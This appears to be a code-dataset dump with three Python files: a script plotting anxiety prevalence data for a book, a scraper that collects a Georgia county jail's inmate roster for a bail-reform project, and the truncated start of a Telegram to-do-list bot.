blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8dd5a412c4409ce9d481424ca81b2ca41f5143de
|
66b756b777c9ed2f09c35e5d6a2d2b255f6c5c6f
|
/book/graphics_anxiety.py
|
861e29fcb312cdd6aeb5abd2db8adb2ec890ae53
|
[] |
no_license
|
al00014/gbd
|
942d826febe935b9d47a417ca6ca089c6cf0cc56
|
8c69a154d01c752d16e65cab983d635d4851c7c3
|
refs/heads/master
| 2021-01-11T06:53:01.899892 | 2020-05-26T13:15:36 | 2020-05-26T13:15:36 | 71,981,670 | 0 | 0 | null | 2016-10-26T08:19:48 | 2016-10-26T08:19:48 | null |
UTF-8
|
Python
| false | false | 3,537 |
py
|
import sys
sys.path += ['../gbd', '../gbd/book', '../dm3-computation_only/', '../dm3-computation_only/book']
import pylab as pl
import pymc as mc
import pandas
import dismod3
reload(dismod3)
import book_graphics
reload(book_graphics)
import matplotlib as mpl
# set font
book_graphics.set_font()
def my_axis(ymax):
pl.axis([-5,105,-ymax/10.,ymax])
def my_plot_data_bars(df, color, label, style='book'):
""" Plot some data bars
Input
-----
df : pandas.DataFrame with columns age_start, age_end, value
"""
data_bars = zip(df['age_start'], df['age_end'], df['value'])
# show at most 500 bars, to keep things fast
# TODO: make 500 into an option
if len(data_bars) > 500:
import random
data_bars = random.sample(data_bars, 500)
# make lists of x and y points, faster than ploting each bar
# individually
x = []
y = []
for a_0i, a_1i, p_i in data_bars:
x += [a_0i, a_1i, pl.nan]
y += [p_i, p_i, pl.nan]
pl.plot(x, y, 's-', mew=1, mec='w', ms=4, color=color, label=label)
def load_new_model():
try:
model = dismod3.data.load('/home/j/Project/dismod/output/dm-34944')
except:
model = dismod3.data.load('/home/j/Project/dismod/dismod_status/prod/dm-34944')
model.keep(areas=['australasia'], sexes=['female'], start_year=2000)
# seems to be some trouble with missing values in the mx covariates
model.input_data = model.input_data.drop(['x_mx_conflict_bin', 'x_mx_shock_10_years_bin'], axis=1)
model.parameters['p']['fixed_effects']['x_sex'] = dict(dist='Constant', mu=0)
model.parameters['p']['fixed_effects']['x_cv_below7disorders'] = dict(dist='Constant', mu=0)
return model
best_model = load_new_model()
pm_model = load_new_model()
pm_model.input_data = pm_model.input_data[pm_model.input_data['x_cv_past_year'] == 0]
# figure anxiety-data_by_cv
pl.figure(**book_graphics.half_page_params)
df = best_model.get_data('p')
pl.figure(**book_graphics.half_page_params)
for i in range(2):
pl.subplot(1,2,1+i)
dismod3.graphics.plot_data_bars(df[df['x_cv_past_year'] == i])
pl.xlabel('Age (years)')
pl.ylabel('Prevalence (%)')
pl.yticks([0, .07, .14, .21, .28], [0, 7, 14, 21, 28])
my_axis(.30)
if i == 0: book_graphics.subtitle('(a)')
if i == 1: book_graphics.subtitle('(b)')
pl.subplots_adjust(wspace=.35, top=.99, bottom=.14)
pl.savefig('book/graphics/anxiety-data_by_cv.pdf')
pl.savefig('book/graphics/anxiety-data_by_cv.png')
# figure anxiety-FE
data = pandas.read_csv('/home/j/Project/dismod/gbd/data/applications-data_anxiety.csv')
pl.figure(**book_graphics.full_page_params)
my_plot_data_bars(best_model.get_data('p'), color='grey', label='Period prevalence')
my_plot_data_bars(pm_model.get_data('p'), color='black',label='Point prevalence')
pl.plot(pl.arange(101), pl.array(data['best']), 'k-', linewidth=2, label='All data, with fixed effects')
pl.plot(pl.arange(101), pl.array(data['no_FE']), 'k--', linewidth=2, label='All data, without fixed effects')
pl.plot(pl.arange(101), pl.array(data['pt_p']), 'k:', linewidth=2, label='Point prevalence')
pl.xlabel('Age (years)')
pl.ylabel('Prevalence (%)')
pl.yticks([0, .07, .14, .21, .28], [0, 7, 14, 21, 28])
my_axis(.30)
pl.legend(loc='upper right', fancybox=True, shadow=True)
pl.savefig('book/graphics/anxiety-FE.pdf')
pl.savefig('book/graphics/anxiety-FE.png')
pl.show()
|
[
"[email protected]"
] | |
327775f554307166eebd19b680c8f7b182103d28
|
dedf6e9dea2d6a30dda669c954eb2cc059553768
|
/src/webscraper/henry/scraper_henry.py
|
769860fe05e287b6053d2fb1480735edaeaf5468
|
[
"MIT"
] |
permissive
|
rimjieun/aclu-bail-reform
|
a5b6fc71b30e053c08f6c3e0571346655c98cd30
|
87ac06375a52afdbe79e8ce04542d43498ee4d51
|
refs/heads/master
| 2021-08-30T17:36:25.701705 | 2017-12-18T20:57:01 | 2017-12-18T20:57:01 | 106,773,872 | 0 | 0 |
MIT
| 2017-12-18T18:52:31 | 2017-10-13T03:31:26 |
Python
|
UTF-8
|
Python
| false | false | 32,773 |
py
|
import requests
import numpy as np
import pandas as pd
import time
from warnings import warn
from bs4 import BeautifulSoup
from datetime import datetime
class ScraperHenry(object):
"""Webscraper for Henry county jail, GA
TODO: Update this from copied Athens-Clarke
This county has 2 main sites to scrape: their current inmate roster
and their arrests from the last 7 days (booking report).
They offer similar information, but the booking report also shows released
inmates, whether they posted bail / time served / recognizance / etc.,
court jurisdiction and warrant #s. Best to make 2 CSV files so we can
use the two info sources in different ways.
"""
def __init__(self, timeout=10, retries=0, sleep_sec=5):
self.url_roster = "http://www.henrycountysheriff.net/InmateInformation" # entry URL from which to start scraping current inmate roster
self.timeout = timeout # seconds timeout to avoid infinite waiting
self.retries = retries # how many times to retry loading if there's http errors.
self.sleep_sec = sleep_sec # seconds to wait between subpage requests to avoid overloading server
response = requests.head(url=self.url_roster) # set user-agent so they can contact us if they don't like how we're scraping
self.headers = {'User-Agent' : response.request.headers['User-Agent'] + ' (Contact [email protected], https://github.com/lahoffm/aclu-bail-reform)'}
self.csv_dir = '../../../data' # where to write data
self.df = [] # will be a dataframe later. self.df is created for inmate roster, dumped to file, recreated for booking report, dumped to file
def scrape_all(self):
""" Scrape main page then each inmate's subpage with more details.
Assemble results into pandas dataframe in standard format and dump to CSV file."""
html_main = self.scrape_main_roster() # current inmate roster
self.scrape_sub(html_main, 'roster')
self.dump('current-inmate-roster')
def scrape_main_roster(self):
"""Get main inmate roster table into data frame formatted for the output CSV"""
# Get main page table into data frame
html_main, errormsg = self.get_page(self.url_roster) # will be used to get subpage links
if errormsg is not None:
raise requests.RequestException('Could not get main jail page. Error message: ' + errormsg)
df_list = pd.read_html(html_main, header=0, converters={'MID#': str,
'NAME': str,
'SEX': str,
'RACE': str,
'BOOKING DATE': str,
'CHARGE': str,
'BOND AMOUNT': str,
'CASE NUMBER': str,
'POLICE CASE#': str,
'YEAR OF BIRTH': str,
'VISITATION': str})
assert len(df_list) == 1, 'Should be only 1 table on page'
df_main = df_list[0]
df_main = df_main.iloc[1:,:] # drop 1st row, it's all NaN because site had an extra TR tag.
df_main.reset_index(drop=True, inplace=True) # so indexes equal to self.df indexes
assert all(df_main.columns==['MID#', 'NAME', 'SEX', 'RACE', 'BOOKING DATE', 'CHARGE', 'BOND AMOUNT', 'CASE NUMBER', 'POLICE CASE#', 'YEAR OF BIRTH', 'VISITATION']), 'Column names have changed'
self.init_df(df_main.shape[0]) # init self.df
# Set URL - will be overwritten with subpage's url unless we get HTTP errors
self.df['url'] = self.url_roster
# Set inmate ID
assert all(pd.notnull(df_main['MID#']))
assert df_main['MID#'].nunique() == df_main.shape[0], 'Non-unique inmate IDs' # check inmate IDs are unique so matching works in scrape_sub
self.df['inmate_id'] = df_main['MID#']
# Set inmate last/first/middle name.
self.set_inmate_name(df_main)
# Set inmate sex
self.set_inmate_sex(df_main)
# Set inmate race
self.set_inmate_race(df_main)
# Set booking timestamp
self.set_booking_timestamp(df_main, 'BOOKING DATE')
# Not setting charges or bond_amount from main page, because more detailed info found in subpages
# Set case number - many are blank for Athens-Clarke county
# Replace semicolons so ETL code doesn't think they are multiple processing numbers
# Format is 'Case # XXX;Police case # XXX'. If one or both are missing there is still a ';'
# so ETL parser knows what's missing.
self.df['processing_numbers'] = 'Case # ' + df_main['CASE NUMBER'].str.replace(';',':')
self.df['processing_numbers'].fillna('', inplace=True)
tmp = ';Police case # ' + df_main['POLICE CASE#'].str.replace(';',':')
tmp.fillna(';', inplace=True)
self.df['processing_numbers'] = self.df['processing_numbers'].str.cat(tmp)
# Set inmate date of birth - only the year is available for Athens-Clarke county
self.set_inmate_dob(df_main)
# Set inmate age when we scraped the site
self.set_inmate_age(df_main)
return html_main
def scrape_main_booking(self):
""" Get main inmate booking table into data frame formatted for the output CSV.
NB in contrast to scrape_main_roster, we have to do some split/apply/combine
at the end, because inmates have one row per charge on the main page.
What we want is to get one row per inmate. """
# Get main page table into data frame
html_main, errormsg = self.get_page(self.url_booking) # will be used to get subpage links
if errormsg is not None:
raise requests.RequestException('Could not get main jail page. Error message: ' + errormsg)
df_list = pd.read_html(html_main, header=0, converters={'MID#': str,
'BOOKING TIME': str,
'NAME': str,
'YEAR OF BIRTH': str,
'RACE': str,
'SEX': str,
'ARRESTING AGENCY': str,
'RELEASE TIME': str,
'CHARGE': str,
'CRIME TYPE': str,
'COURT JURISDICTION': str,
'BONDING COMPANY': str,
'BOND AMOUNT': str,
'WARRANT #': str,
'POLICE CASE#': str})
assert len(df_list) == 1, 'Should be only 1 table on page'
df_main = df_list[0] # Unlike for roster, don't have to drop 1st row
assert all(df_main.columns==['MID#', 'BOOKING TIME', 'NAME', 'YEAR OF BIRTH', 'RACE', 'SEX', 'ARRESTING AGENCY', 'RELEASE TIME', 'CHARGE', 'CRIME TYPE', 'COURT JURISDICTION', 'BONDING COMPANY', 'BOND AMOUNT', 'WARRANT #', 'POLICE CASE#']), 'Column names have changed'
self.init_df(df_main.shape[0]) # init self.df - final nrows will be smaller because of split/apply/combine later
# Set URL - will be overwritten with subpage's url unless we get HTTP errors
self.df['url'] = self.url_booking
# Set inmate ID --> the main booking page MID# differs from inmate detail page MID#, so this will be overwritten
# when scraping subpages. Will ultimately save subpage MID# because this is consistent with how "current roster"
# page does it. We need the main page MID# in this function to do split/apply/combine by inmate.
assert all(pd.notnull(df_main['MID#'])) # Unlike for roster, not checking inmate IDs are unique
self.df['inmate_id'] = df_main['MID#']
# Set booking timestamp
self.set_booking_timestamp(df_main, 'BOOKING TIME')
# Set inmate last/first/middle name.
self.set_inmate_name(df_main)
# Set inmate date of birth - only the year is available for Athens-Clarke county
self.set_inmate_dob(df_main)
# Set inmate race
self.set_inmate_race(df_main)
# Set inmate sex
self.set_inmate_sex(df_main)
# Set arresting agency
assert all(pd.notnull(df_main['ARRESTING AGENCY']))
self.df['agency'] = df_main['ARRESTING AGENCY']
# Set release timestamp - county has different format than booking times
# See set_booking_timestamp() for more comments
df_main['RELEASE TIME'].fillna('', inplace=True)
convert_dt = lambda dt : '' if dt=='' else (str(datetime.strptime(dt, "%m/%d/%Y %I:%M%p")) + ' EST') # Format changes will likely be caught here
self.df['release_timestamp'] = df_main["RELEASE TIME"].apply(convert_dt)
# Set charge - at present, there's 1 row per charge but will split/apply/combine later so it's 1 row per inmate
df_main['CHARGE'].fillna('', inplace=True) # this happens sometimes, probably as they are in process of updating a person's charge
self.df['charges'] = df_main['CHARGE'].str.replace(';',':') # convert so we can later chain charges with ';'
# Set charge severity - ignoring "Local ordinance" because it's rare
df_main.fillna('', inplace=True) # all columns from this point forward probably have NaN so fill with ''
df_main['CRIME TYPE'] = df_main['CRIME TYPE'].str.lower().str.replace('local ordinance','')
assert np.isin(df_main['CRIME TYPE'].unique(), np.array(['misdemeanor','felony',''])).all(), 'Invalid misdemeanor/felony format.'
self.df['severity'] = df_main['CRIME TYPE']
# Set court jurisdiction in 'other' field
self.df['other'] = pd.Series(['Court jurisdiction: ']*df_main.shape[0]).str.cat(df_main['COURT JURISDICTION'].str.replace(';',':'))
self.df.loc[self.df['other']=='Court jurisdiction: ','other'] = ''
# Set bond_amount - will add to this when scraping subpages
self.format_bond_amount(df_main)
df_main['BONDING COMPANY'] = df_main['BONDING COMPANY'].str.replace(';',':')
self.df['bond_amount'] = df_main['BOND AMOUNT'].str.cat([["( Bonding company:"]*df_main.shape[0],\
df_main['BONDING COMPANY'],\
[')']*df_main.shape[0]],\
sep=' ')
# Set case number & warrant number - see comments in scrape_main_roster()
self.df['processing_numbers'] = 'Warrant # ' + df_main['WARRANT #'].str.replace(';',':')
self.df.loc[self.df['processing_numbers']=='Warrant # ','processing_numbers'] = ''
tmp = ',Police case # ' + df_main['POLICE CASE#'].str.replace(';',':')
tmp[tmp==',Police case # '] = ',' # split with ',' instead of ';' because each charge has its own warrant/case#
self.df['processing_numbers'] = self.df['processing_numbers'].str.cat(tmp)
# Set inmate age when we scraped the site
self.set_inmate_age(df_main)
# Split/apply/combine
# On the main booking site they post multiple rows per inmate, one row per charge.
# This code compresses it into one row per inmate, as required for the csv specification
inmate_groups = self.df.groupby('inmate_id', sort=False, as_index=False) # each group = 1 inmate
self.df = inmate_groups.apply(self.compress_inmate_rows) # now each inmate (technically, each inmate_id) has one row with 1+ charges, etc.
self.df.reset_index(drop=True, inplace=True) # apply() returns it with multiindex we don't need
return html_main
def scrape_sub(self, html_main, flag):
""" Scrape each inmate's details page - links from main page.
Add data to the inmate's row in self.df.
Retry self.retries times if there's any errors, then skip to next
subpage. If subpage couldn't be loaded, log it in the "notes" field.
flag: 'roster' or 'booking' to scrape differently based on what is on main page
"""
soup = BeautifulSoup(html_main, 'lxml')
nlinks = len(list(soup.find_all('a', href=True)))
if flag=='roster':
assert nlinks == self.df.shape[0], "Number of hrefs != number of table entries"
else:
self.df['inmate_id'] = '' # The booking page MID# differs from inmate detail MID#. We will use the subpage MID# for consistency with "current roster" page
self.df['notes'] = 'Failed to load inmate detail page. Leaving some fields blank' # will be erased ONLY when page successfully loads
i = 0
for a in soup.find_all('a', href=True): # scrape each subpage (which have additional details for a single inmate)
# Get subpage
# The tag's format should be
# <a href="##" onclick="window.open('detailsNEW.asp?id=-59091&bid=2017-00004550&pg=1&curr=yes',
# 'search', 'width=730,height=800,status=yes,resizable=yes,scrollbars=yes')">ABOYADE, OLUFEMI BABALOLA</a>
i = i + 1
print('Downloading subpage {0} of {1}...'.format(i, nlinks))
url_main = self.url_roster if flag=='roster' else self.url_booking
subpage_url = url_main[0:url_main.rfind('/')+1] + a["onclick"].split(',')[0].split("'")[1]
if any(self.df['url'].isin([subpage_url])): # already visited link - happens for booking site
continue
html_sub, errormsg = self.get_page(subpage_url)
if errormsg is not None:
warn('Could not get URL "' + subpage_url + '" for subpage ' + str(i) + '. Error message: ' + errormsg + '. Continuing to next page')
continue
# Get subpage's 2 tables in dataframes
try:
df_list = pd.read_html(html_sub, match="Name:", converters={0: str, 1: str, 2: str, 3: str})
except ValueError as e:
warn(str(e) +' for subpage ' + str(i) + ', continuing to next page.')
continue
assert len(df_list) == 1, "Should be only 1 table on page with matching text."
df_sub1 = df_list[0]
assert df_sub1.shape==(5,4), 'Wrong table dimensions'
if pd.isnull(df_sub1.loc[1,1]): df_sub1.loc[1,1]='' # for blank addresses
if pd.isnull(df_sub1.loc[2,3]): df_sub1.loc[2,3]='' # for blank races
assert df_sub1.iloc[0,0]=='Name:' and df_sub1.iloc[1,0]=='Address:' and df_sub1.iloc[2,0]=='Sex:'\
and df_sub1.iloc[3,0]=='Year of Birth:' and df_sub1.iloc[4,0]=='Booking Date/Time:' and pd.notnull(df_sub1.iloc[:,1]).all()\
and df_sub1.iloc[0,2].startswith('MID#: ') and pd.isnull(df_sub1.iloc[1,2]) and df_sub1.iloc[2,2]=='Race:'\
and df_sub1.iloc[3,2]=='Height/Weight:' and df_sub1.iloc[4,2]=='Released Date/Time:' and pd.isnull(df_sub1.iloc[0,3])\
and pd.isnull(df_sub1.iloc[1,3]) and pd.notnull(df_sub1.iloc[2:5,3]).all(), 'Table format has changed'
df_list = pd.read_html(html_sub, header=0, match="ARRESTING AGENCY", converters={0: str, 1: str, 2: str, 3: str, 4: str, 5: str, 6: str})
assert len(df_list) == 1, "Should be only 1 table on page with matching text."
df_sub2 = df_list[0]
assert all(df_sub2.columns==['ARRESTING AGENCY', 'GRADE OF CHARGE', 'CHARGE DESCRIPTION', 'BOND AMOUNT', 'BOND REMARKS', 'BOND LAST UPDATED', 'DISPOSITION']), 'Column names have changed'
assert not df_sub2.empty, 'Table has zero rows'
# Find matching self.df row where we will insert data
inmate_id = df_sub1.iloc[0,2][6:] # checked above that it starts with 'MID#: '
if flag=='roster': # Use inmate id to match
ix = self.df.index[self.df['inmate_id']==inmate_id] # scrape_main_roster checked that inmate IDs are all unique, so this will match 1 row
assert not self.df.loc[ix].empty, 'Inmate id "' + inmate_id + '" not found in main page'
else: # The booking page MID# differs from inmate detail MID#, so we have to match inmates other way
inmate_name = df_sub1.iloc[0,1]
booking_timestamp = self.convert_dt(df_sub1.iloc[4,1])
inmate_names = self.df['inmate_lastname'].str.cat([[', ']*self.df.shape[0], \
self.df['inmate_firstname'], [' ']*self.df.shape[0], self.df['inmate_middlename']]).str.rstrip()
tmp = pd.DataFrame({'inmate_name':inmate_names,'booking_timestamp':self.df['booking_timestamp']})
ix = tmp.index[(tmp['inmate_name']==inmate_name) & (tmp['booking_timestamp']==booking_timestamp)]
assert len(ix) == 1, 'Should be exactly one matching inmate in main page'
# Set inmate ID
if flag=='booking': # roster site has same inmate id on main page & subpage.
# booking site's inmate ids differ on main page & subpages but to be consistent
# with roster site, set it to subpage's inmate id.
self.df.loc[ix,'inmate_id'] = inmate_id
# Set URL
self.df.loc[ix,'url'] = subpage_url
# Set inmate address
self.df.loc[ix, 'inmate_address'] = df_sub1.iloc[1,1]
# Set agency
if flag=='roster': # booking site had this in main page
assert all(pd.notnull(df_sub2['ARRESTING AGENCY'])), 'Invalid arresting agency format'
try:
assert df_sub2['ARRESTING AGENCY'].nunique()==1, 'Invalid arresting agency format'
except AssertionError as e:
warn(str(e) + ", multiple arresting agencies for subpage " + str(i) + ". Inserting the agency that made the arrest for each charge")
df_sub2.loc[0, 'ARRESTING AGENCY'] = df_sub2['ARRESTING AGENCY'].str.cat(sep=';')
self.df.loc[ix, 'agency'] = df_sub2.loc[0, 'ARRESTING AGENCY']
df_sub2.fillna('', inplace=True) # important for later fields so semicolons go in right places
# Set charge severity.
# Sometimes one "grade of charge" is NaN, means they are holding the inmate for some other county.
# We still put in the same fields, but the "grade of charge" will be an empty string.
if flag=='roster': # booking site had this in main page
if any(df_sub2['GRADE OF CHARGE'] == 'L'): # 'L' means 'Local ordinance' but this is rare so ignoring it
df_sub2['GRADE OF CHARGE'] = df_sub2['GRADE OF CHARGE'].str.replace('L','')
warn("Grade of charge 'L' (local ordinance) for subpage " + str(i) + ". Replacing with ''")
assert np.isin(df_sub2['GRADE OF CHARGE'].unique(), np.array(['M','F',''])).all(), 'Invalid misdemeanor/felony format.'
df_sub2['GRADE OF CHARGE'] = df_sub2['GRADE OF CHARGE'].str.replace('M','misdemeanor').str.replace('F','felony')
self.df.loc[ix, 'severity'] = df_sub2['GRADE OF CHARGE'].str.cat(sep=';')
# Set charges, separated by ';' even if charge description is empty string
# Have to replace ';' with ':' first to prevent bug
if flag=='roster': # booking site had this in main page
self.df.loc[ix,'charges'] = df_sub2['CHARGE DESCRIPTION'].str.replace(';',':').str.cat(sep=';')
# Set bond amount for each charge, separated by ';'.
if flag=='roster': # booking site had this in main page
self.format_bond_amount(df_sub2)
df_sub2['BOND REMARKS'] = df_sub2['BOND REMARKS'].str.replace(';',':')
df_sub2['BOND LAST UPDATED'] = df_sub2['BOND LAST UPDATED'].str.replace(';',':')
self.df.loc[ix,'bond_amount'] = df_sub2['BOND AMOUNT'].str.cat([df_sub2['BOND REMARKS'],
[' Bond last updated']*df_sub2.shape[0],
df_sub2['BOND LAST UPDATED']],
sep=' ').str.cat(sep=';')
# The reason this is not in bond_amount field
# is because sometimes we can't match up charges 1-1 with the charge on the main page.
# For example, sometimes several charges in main page turn into one charge in subpage.
# Note main page already gives bond amount and whether they posted bond.
if flag=='booking':
supp_str = pd.Series(['Supplemental bond info for charge ']*df_sub2.shape[0]).str.cat(
[df_sub2['CHARGE DESCRIPTION'],
[': bond remarks ']*df_sub2.shape[0],
df_sub2['BOND REMARKS'],
[', bond last updated ']*df_sub2.shape[0],
df_sub2['BOND LAST UPDATED']]).str.cat(sep=';')
self.df.loc[ix,'other'] = self.df.loc[ix,'other'].str.cat([supp_str], sep=' ||| ')
# Set status for each charge like 'SENTENCED'. For this site, most statuses are blank.
if flag=='roster': # nb see comment above for why we don't do this for flag==booking
self.df.loc[ix, 'current_status'] = df_sub2['DISPOSITION'].str.replace(';',':').str.cat(sep=';')
# Set notes
self.df.loc[ix,'notes'] = ''
time.sleep(self.sleep_sec)
def init_df(self, nrows):
""" This will go in CSV file. """
self.df = pd.DataFrame(np.zeros((nrows, 25)), columns=[
'county_name', # yes
'timestamp', # yes - time main page was scraped
'url', # yes - subpage urls (if couldn't connect, it's the main page url)
'inmate_id', # yes
'inmate_lastname', # yes
'inmate_firstname', # yes
'inmate_middlename', # yes
'inmate_sex', # yes
'inmate_race', # yes
'inmate_age', # yes - the age they turn on their birthdays in current year
'inmate_dob', # yes - only the year
'inmate_address', # yes - in subpages
'booking_timestamp', # yes
'release_timestamp', # yes - only for booking reports site, not for current roster site
'processing_numbers', # yes
'agency', # yes - in main page or subpages
'facility', # yes
'charges', # yes - in subpages
'severity', # yes - in subpages
'bond_amount', # yes - in main page or subpages
'current_status', # yes - in subpages
'court_dates',
'days_jailed',
'other', # yes for booking reports site - court jurisdiction
'notes']) # yes
self.df[:] = '' # unfilled columns will be written to CSV as empty strings
self.df['county_name'] = 'athens-clarke'
self.df['facility'] = 'Clarke County Jail' # only one jail in this county, apparently
self.df['timestamp'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S EST') # hardcoded EST because it's not critical to get the hour correct,
# timestamps are just for knowing roughly when we scraped.
def format_bond_amount(self, dataframe):
""" Formats a dollar string in dataframe column
If bond amount is '$0.00', '$' or '' there will be no dollar amount starting the bond_amount field,
just ' ' then the bond remarks / bond last updated. """
dataframe.loc[dataframe['BOND AMOUNT']=='$0.00','BOND AMOUNT'] = '' # Usually indicates no bond, not "released without bond"
dataframe.loc[dataframe['BOND AMOUNT']=='$', 'BOND AMOUNT'] = '' # Sometimes this happens, not sure what it means
dataframe['BOND AMOUNT'] = dataframe['BOND AMOUNT'].str.replace(',','') # Replace $1,000.00 with $1000.00
def set_inmate_name(self, df_main):
""" Set inmate last/first/middlename. Assumes format is "lastname, firstname zero or more middle names" """
assert all(pd.notnull(df_main['NAME']))
inmate_name = df_main['NAME'].str.split(', ', n=1, expand=True)
assert inmate_name.shape[1] == 2, 'Invalid name format'
self.df['inmate_lastname'] = inmate_name.iloc[:,0]
inmate_name = inmate_name.iloc[:,1]
inmate_name = inmate_name.str.split(' ', n=1, expand=True)
assert inmate_name.shape[1] == 2, 'Invalid name format'
inmate_name.fillna('', inplace=True)
self.df['inmate_firstname'] = inmate_name.iloc[:,0]
self.df['inmate_middlename'] = inmate_name.iloc[:,1]
def set_inmate_sex(self, df_main):
assert all(pd.notnull(df_main['SEX']))
assert np.isin(df_main['SEX'].str.lower().unique(), np.array(['male','female'])).all(), "Invalid sex format"
self.df['inmate_sex'] = df_main['SEX'].str.lower().str[0]
def set_inmate_race(self, df_main):
if any(pd.isnull(df_main['RACE'])):
warn("At least one inmate's race was blank.")
df_main['RACE'].fillna('', inplace=True)
inmate_race = df_main['RACE'].str.lower() # don't have to convert 'asian' or 'white' because already listed that way
inmate_race = inmate_race.str.replace('black/african american', 'black')\
.str.replace('hispanic or latino', 'hispanic')\
.str.replace('middle eastern decent', 'middle-eastern') # they had a typo
assert np.isin(inmate_race.unique(), np.array(['asian','white','black','hispanic','middle-eastern',''])).all(),\
"One or more of these races not converted to standard format: " + str(inmate_race.unique())
self.df['inmate_race'] = inmate_race
def set_inmate_age(self, df_main):
""" Set inmate age when we scraped the site.
Because we only have birth year, age is whatever age they turn on their birthdays in the current year.
That means it's impossible for 18 year olds (minimum booking age) to be incorrectly assigned age 17. """
calc_age = lambda yyyy : str(datetime.now().year - int(yyyy))
self.df['inmate_age'] = df_main['YEAR OF BIRTH'].apply(calc_age)
def set_inmate_dob(self, df_main):
""" Set inmate date of birth - only the year is available for Athens-Clarke county """
assert all(pd.notnull(df_main['YEAR OF BIRTH']))
assert all(df_main['YEAR OF BIRTH'].str.len()==4), 'Invalid year of birth format'
self.df['inmate_dob'] = df_main['YEAR OF BIRTH']
def set_booking_timestamp(self, df_main, booking_colname):
""" Set booking timestamp from appropriate column.
Hardcoding 'EST' because Athens-Clarke county is in Georgia USA
See https://docs.python.org/3/library/datetime.html#strftime-strptime-behavior
Outputs 'YYYY-MM-DD HH:MM:SS EST', see https://docs.python.org/3/library/datetime.html#datetime.datetime.__str__ """
assert all(pd.notnull(df_main[booking_colname]))
self.df['booking_timestamp'] = df_main[booking_colname].apply(self.convert_dt)
def convert_dt(self, dt):
return str(datetime.strptime(dt, "%m/%d/%Y %I:%M:%S %p")) + ' EST' # Format changes will likely be caught here
def compress_inmate_rows(self, df_inmate):
""" Used with pandas groupby & apply methods.
df_inmate = self.df with only the rows for a single inmate.
This compresses them into a single row and returns the row"""
# Before compressing, check that rows are identical where they SHOULD be identical.
# For example, the inmate's last name should be identical for each row in this group
# (only checking rows obtained from main page data)
errmsg = '>1 unique values in group column'
assert df_inmate['inmate_lastname'].nunique()==1, errmsg
assert df_inmate['inmate_firstname'].nunique()==1, errmsg
assert df_inmate['inmate_middlename'].nunique()==1, errmsg
assert df_inmate['inmate_sex'].nunique()==1, errmsg
assert df_inmate['inmate_race'].nunique()==1, errmsg
assert df_inmate['inmate_age'].nunique()==1, errmsg
assert df_inmate['inmate_dob'].nunique()==1, errmsg
assert df_inmate['booking_timestamp'].nunique()==1, errmsg
# Copy it to avoid possible side effects
# See https://pandas.pydata.org/pandas-docs/stable/generated/pandas.core.groupby.GroupBy.apply.html
df_onerow = df_inmate.iloc[0,:].copy().to_frame().transpose()
# Set the fields that are allowed to have different entries (one entry per charge), separated by ';'
# Previous processing already replaced ';' in fields with ':'
df_onerow['release_timestamp'] = df_inmate['release_timestamp'].str.cat(sep=';')
df_onerow['processing_numbers'] = df_inmate['processing_numbers'].str.cat(sep=';')
if df_inmate['agency'].nunique()>1:
warn("Multiple arresting agencies for inmate ID " + df_onerow.loc[df_onerow.index[0],'inmate_id'] + ". Inserting the agency that made the arrest for each charge")
df_onerow['agency'] = df_inmate['agency'].str.cat(sep=';') # SHOULD be indented under if statement
df_onerow['charges'] = df_inmate['charges'].str.cat(sep=';')
df_onerow['severity'] = df_inmate['severity'].str.cat(sep=';')
df_onerow['bond_amount'] = df_inmate['bond_amount'].str.cat(sep=';')
df_onerow['other'] = df_inmate['other'].str.cat(sep=';')
return df_onerow
def dump(self, fid):
""" dump to CSV """
csv_fname = datetime.now().strftime('athens-clarke_' + fid + '_%Y_%m_%d_%H_%M_%S.csv')
self.df.to_csv(self.csv_dir + '/' + csv_fname, index=False, line_terminator='\n') # matches default params for csv.writer
print('Wrote ' + csv_fname + ' to ' + self.csv_dir)
def get_page(self, url):
""" Get html for a single page. If errors, retries loading page self.retries times.
Returns html text (None if errors)
and error message (None if no errors)"""
retries_left = self.retries
while retries_left >= 0:
try:
response = requests.get(url, timeout=self.timeout, headers=self.headers)
if response.status_code != requests.codes.ok:
raise requests.HTTPError('HTTP response code was {0}, should have been {1}'.format(response.status_code, requests.codes.ok))
return response.text, None # no errors
except Exception as e:
errormsg = str(e)
retries_left = retries_left - 1
return None, errormsg # errors on the last attempt
|
[
"[email protected]"
] | |
ad65d58afad4706819ae377f348ce126c1e23d7b
|
1a59761698398fbaa4de3640ba39ed44fbee3dc6
|
/exercise1.py
|
d2592530b7a7f5d638d3b9ea663c098567ce8c1a
|
[] |
no_license
|
Michelangelo98/python-lab3
|
6a5fb1a045e653beaee59c33c9c1f6c212dac38f
|
41fcd5532563ded86937c6a00c80dd929d217532
|
refs/heads/master
| 2020-07-25T09:31:51.022805 | 2019-09-15T16:37:18 | 2019-09-15T16:37:18 | 208,246,559 | 0 | 0 | null | 2019-09-13T10:56:12 | 2019-09-13T10:56:10 | null |
UTF-8
|
Python
| false | false | 3,314 |
py
|
from telegram.ext import Updater,CommandHandler,MessageHandler,Filters
import telegram
from sys import argv
def start(bot, update):
update.message.reply_text("Hello!")
def show_all_task(bot,update) :
file_in = open(argv[1])
todo_list = file_in.read().splitlines()
file_in.close()
if todo_list == [""] or todo_list == [] :
update.message.reply_text("Nothing to do, here!")
else:
update.message.reply_text(str(todo_list))
def new_task(bot,update,args) :
file_in = open(argv[1])
todo_list = file_in.read().splitlines()
file_in.close()
to_add = " ".join(args)
if to_add in todo_list :
update.message.reply_text("The task was already present")
return
file_out = open(argv[1],'a')
file_out.write(to_add + "\n")
file_out.close()
update.message.reply_text("The new task was succesfully added")
def remove_task(bot,update,args) :
file_in = open(argv[1])
todo_list = file_in.read().splitlines()
file_in.close()
